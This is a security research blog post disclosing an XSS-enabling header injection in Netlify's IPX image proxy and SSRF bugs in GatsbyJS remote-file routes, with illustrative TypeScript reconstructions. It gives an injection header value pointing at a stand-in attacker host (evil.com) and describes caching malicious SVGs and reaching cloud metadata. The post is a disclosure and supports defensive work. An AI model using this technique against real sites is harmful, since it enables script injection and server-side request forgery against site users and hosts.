Exploiting Static Site Generators: When Static Is Not Actually Static
Over the last ten years, we have seen the industrialization of the content management space. A decade ago, it felt like every individual and business had a dynamic WordPress blog, loaded up with a hundred plugins to do everything from adding widgets to improving performance. Over time, we realised this was a bad idea, as ensuring the security of third-party plugins seemed increasingly impossible.
People aspired to have faster websites with fewer security risks. They were tired of trying to improve performance by installing a plugin like W3-Total-Cache, only to realise later that they had been compromised because it had critical vulnerabilities.
Naturally, people started building alternatives to what felt like a broken content management system from a security and performance perspective. Some people started moving to the model of publishing their WordPress blogs in a static manner, but we also saw the rise of static site generators like Jekyll, Hugo, Gatsby and Next.js.
These static site generators promised performance, because they did not require server-side processing (unless that was something you really wanted), and security too, because static sites are supposed to be static, right? How are you going to find vulnerabilities in a static site?
But eventually, once these static site generators had matured, along came CDN/CI platforms such as Netlify and Vercel, which layered on many of the additional features that people had always longed for. Additionally, some static site generators, like Gatsby, offered a cloud version of their product.
Unfortunately, the additional server-side features offered through these platforms came at a cost: they had to run somewhere. Typically, this was “on the edge”, which is just a fancy way of saying they were run by the respective platforms on their CDNs as serverless functions.
Now, when most people think about server-side code running on someone else's computer, especially in a serverless context, they rightfully understand that many server-side risks of compromise (e.g. SSRF) are no longer as impactful. But what about the potential client-side issues that may exist?
The rise of these static site generator frameworks also holds a very important place in the Web3 world. My friend Sam Curry's deep application security research in the Web3 space was the main reason I spent so much time looking at these frameworks and platforms in the first place.
You can read Sam’s take on these issues here. In his blog post, you’ll find a few more examples of vulnerabilities in Next.js’s image optimizer, as well as the vulnerability we found in Netlify IPX, which we also discuss in this blog.
It all started with a message from Sam showing me some interesting behaviour on www.gemini.com, one of the largest crypto exchanges in the world, which uses Netlify + Next.js to host its website.
This intrigued me because, at first glance, it looked like functionality to both pull and optimize images from remote sources was built directly into Netlify-operated websites. It reminded me of Next.js’s native image optimization functionality (found at <span class="code_single-line">_next/image</span>): similar, but specific to Netlify and hosted at <span class="code_single-line">_ipx/</span>.
In Next.js, the image proxy cannot pull data from remote sources unless the domain is on an explicit whitelist (domain or regex), which is typically not populated by default. We thought this implementation might be similar, so we took a look at the source code for the <span class="code_single-line">@netlify/ipx</span> library.
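To make the idea of an explicit whitelist concrete, here is a minimal sketch of what a domain-or-regex check might look like. This is not the Next.js implementation: the <span class="code_single-line">RemoteAllowlist</span> shape, the <span class="code_single-line">isAllowedRemote</span> function and the example hostnames are all hypothetical names we made up for illustration.

```typescript
// Hypothetical allowlist shape: exact hostnames plus optional hostname patterns.
// Not the Next.js API; an illustration of the "domain or regex" idea only.
interface RemoteAllowlist {
  domains: string[];
  patterns: RegExp[];
}

function isAllowedRemote(rawUrl: string, allowlist: RemoteAllowlist): boolean {
  let parsed: URL;
  try {
    parsed = new URL(rawUrl);
  } catch {
    return false; // not an absolute URL, so it cannot be a remote source
  }
  if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
    return false;
  }
  const host = parsed.hostname;
  // Match on the parsed hostname, never on the raw string, so that
  // "images.example.com.evil.com" does not pass a check for "images.example.com".
  return (
    allowlist.domains.some((domain) => domain === host) ||
    allowlist.patterns.some((pattern) => pattern.test(host))
  );
}

// An empty allowlist (the typical default described above) rejects everything.
const emptyAllowlist: RemoteAllowlist = { domains: [], patterns: [] };

// Example hostnames are placeholders.
const exampleAllowlist: RemoteAllowlist = {
  domains: ["images.example.com"],
  patterns: [/^cdn-\d+\.example\.com$/],
};
```

With an empty allowlist, every remote URL is rejected, which is why an unpopulated whitelist makes this kind of proxy safe by default.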
Thankfully, Netlify had published the source code of this library on their GitHub, and you can find the vulnerable version of the code here.
When auditing the code, we noticed that Netlify’s IPX library also had mechanisms to whitelist the remote HTTP sources that could be pulled through this image optimizer proxy. However, after reading the code a few times, we noticed that the final URL that was constructed and requested was derived from user input that Netlify had not considered.
On line 33 of the handler, we can see that the value of the <span class="code_single-line">protocol</span> variable is derived from a user-controllable header <span class="code_single-line">x-forwarded-proto</span>:
While this seems benign, it’s worth noting because of the following logic:
The <span class="code_single-line">id</span> variable is derived from the URL path, and a variable <span class="code_single-line">isLocal</span> is declared, which is true when the <span class="code_single-line">id</span> parameter does not start with the literal string <span class="code_single-line">http</span>.
If <span class="code_single-line">isLocal</span> evaluates to true, it constructs a URL to request through the proxy, which unfortunately can easily be tainted through the user-controllable <span class="code_single-line">protocol</span> variable derived from our <span class="code_single-line">x-forwarded-proto</span> header.
By sending a header and value such as <span class="code_single-line">x-forwarded-proto: https://evil.com/?</span>, the constructed URL would request our website, as the <span class="code_single-line">?</span> nullifies the rest of the constructed string.
The even more unfortunate part about this code is that all of the checks that determine whether a host is whitelisted happen in the <span class="code_single-line">else</span> branch, which we are able to skip because <span class="code_single-line">isLocal</span> evaluates to true.
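The flow described above can be sketched in a few lines. This is a simplified reconstruction based on the description in this post, not the library's actual source: the <span class="code_single-line">buildSourceUrl</span> function, the <span class="code_single-line">allowlistChecked</span> flag, the fallback values and the <span class="code_single-line">victim.example</span> hostname are our own assumptions.

```typescript
// Simplified reconstruction of the described flow; NOT the @netlify/ipx source.
// buildSourceUrl, allowlistChecked and the fallback values are hypothetical.
interface SourceDecision {
  url: string;
  allowlistChecked: boolean;
}

function buildSourceUrl(
  headers: Record<string, string | undefined>,
  id: string
): SourceDecision {
  // User-controllable: taken straight from the request header.
  const protocol = headers["x-forwarded-proto"] || "http"; // fallback is an assumption
  const host = headers["host"] || "localhost"; // fallback is an assumption

  // "Local" means the path does not start with the literal string "http".
  const isLocal = !id.startsWith("http");

  if (isLocal) {
    // The tainted protocol is concatenated into the final URL and
    // no allowlist check is applied on this branch.
    const separator = id.startsWith("/") ? "" : "/";
    return { url: `${protocol}://${host}${separator}${id}`, allowlistChecked: false };
  }

  // Remote sources: this is the only branch where the whitelist logic would run.
  return { url: id, allowlistChecked: true };
}

// A well-behaved request produces a URL on the site itself.
const benign = buildSourceUrl(
  { host: "victim.example", "x-forwarded-proto": "https" },
  "/images/logo.png"
);

// A tainted header moves the real host into the query string of evil.com.
const tainted = buildSourceUrl(
  { host: "victim.example", "x-forwarded-proto": "https://evil.com/?" },
  "/malicious.svg"
);

console.log(benign.url);
console.log(tainted.url, new URL(tainted.url).hostname);
```

Parsing the tainted result with <span class="code_single-line">new URL</span> shows that the hostname is now <span class="code_single-line">evil.com</span>, and everything after the <span class="code_single-line">?</span> (including the real host) has become a harmless query string.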
Since the <span class="code_single-line">else</span> code block is skipped, we end up at the following block of code:
The <span class="code_single-line">loadSourceImage</span> function is responsible for downloading the remote resource, as well as caching it to the disk:
As you can see in the logic above, the sink that makes the HTTP request is <span class="code_single-line">fetch</span>, and once the response has been obtained, it is cached to disk.
Now you might be thinking that it’s not all that bad because this is an image optimizer, right? It should only allow image files, so what’s the harm in that?
Unfortunately, due to the underlying use of the ipx library, which ultimately depends on the image-meta library, we can see that the SVG type is supported.
As long as the SVG file matches the following regex, the Netlify IPX handler will happily proxy the response and cache it to disk:
As also stated in Sam’s blog, the final proof-of-concept for this vulnerability can be found below:
Where the contents of <span class="code_single-line">malicious.svg</span> looked something like this:
This resulted in persistent cross-site scripting across hundreds of thousands of Netlify websites that were using Next.js.
The impact was widespread, as by default, if you created a Next.js website on Netlify, it would automatically bootstrap the website to use <span class="code_single-line">package = "@netlify/plugin-nextjs"</span> inside the <span class="code_single-line">netlify.toml</span> file, which loads the <span class="code_single-line">netlify/ipx</span> library into your Next.js project.
When building a Next.js website on Netlify with this plugin installed, we can see in the CI/build logs, that the following routes are registered:
After we had determined that the underlying <span class="code_single-line">netlify/ipx</span> library was vulnerable, we started enumerating where else this functionality may have been used.
Now we’ve found a number of vulnerabilities in Netlify’s implementation of the image proxy, but what about the static site frameworks themselves? We decided to take a closer look at the GatsbyJS framework, as we had already spent a lot of time looking at Next.js.
Targeting any proxy-like functionality inside these code bases, we ended up in <span class="code_single-line">gatsby-plugin-utils/src/polyfill-remote-file/http-routes.ts</span> which defined the following routes:
For <span class="code_single-line">/_gatsby/file/:url/:filename</span>, the sink was <span class="code_single-line">await fetchRemoteFile</span>, and for <span class="code_single-line">/_gatsby/image/:url/:params/:filename</span> the sink was <span class="code_single-line">await transformImage</span>.
The first route allows you to proxy any URL, regardless of content type 😱
The second route only allows you to proxy images. This time, SVGs are not allowed, so the impact is limited to a blind SSRF vulnerability: <span class="code_single-line">Error: Expected one of: heic, heif, avif, jpeg, jpg, png, raw, tiff, tif, webp, gif, jp2, jpx, j2k, j2c for format but received svg of type string</span>.
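The error message above suggests a format allowlist somewhere in the image pipeline. As a rough sketch of that kind of check (our own illustration, not Gatsby's code; the <span class="code_single-line">assertSupportedFormat</span> name is hypothetical and the format list is copied from the error message):

```typescript
// Illustrative only: a format allowlist check that yields a message shaped like
// the one quoted above. assertSupportedFormat is a hypothetical name.
const SUPPORTED_FORMATS: readonly string[] = [
  "heic", "heif", "avif", "jpeg", "jpg", "png", "raw", "tiff",
  "tif", "webp", "gif", "jp2", "jpx", "j2k", "j2c",
];

function assertSupportedFormat(format: string): void {
  if (SUPPORTED_FORMATS.indexOf(format) === -1) {
    throw new Error(
      `Expected one of: ${SUPPORTED_FORMATS.join(", ")} for format ` +
        `but received ${format} of type ${typeof format}`
    );
  }
}

assertSupportedFormat("png"); // passes silently

try {
  assertSupportedFormat("svg");
} catch (error) {
  console.log((error as Error).message);
}
```

Because SVG is rejected before any response body is returned, the attacker never sees the fetched content and cannot serve script-bearing markup, which is why this route is only a blind SSRF.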
In order for these issues to be exploitable, the GatsbyJS server would need to be running. Now, we understand that this is an uncommon configuration as the point of these static site generators … is to actually generate static files that can be hosted.
Nonetheless, these vulnerabilities still pose a real risk to anyone that is running a GatsbyJS server using <span class="code_single-line">gatsby develop</span> instead of hosting the static files or using <span class="code_single-line">gatsby serve</span>.
The full-read server-side request forgery vulnerability in GatsbyJS can be exploited through the following cURL command:
The blind server-side request forgery vulnerability can be exploited via the following cURL command:
The full-read SSRF vulnerability allowed us to hit GatsbyJS’s GCP metadata IP address:
It is important to note that in order to communicate further with the GCP metadata IP address and pull any sensitive information, we must provide a custom header, which is not possible through GatsbyJS’s proxy implementation. Additionally, after discussing with the Gatsby security team, they confirmed that the GCP metadata access is for their Image CDN provider, not Gatsby’s hosting infrastructure.
During routine scans of our customers’ infrastructure for this vulnerability, we discovered that these vulnerabilities were exploitable in some configurations of GatsbyJS’s cloud product. This led to a number of high-impact, high-profile cross-site scripting vulnerabilities on our customers’ attack surfaces.
You can read the official advisory from GatsbyJS regarding these vulnerabilities here: https://www.gatsbyjs.com/blog/vulnerability-patched-in-the-gatsby-cloud-image-cdn/.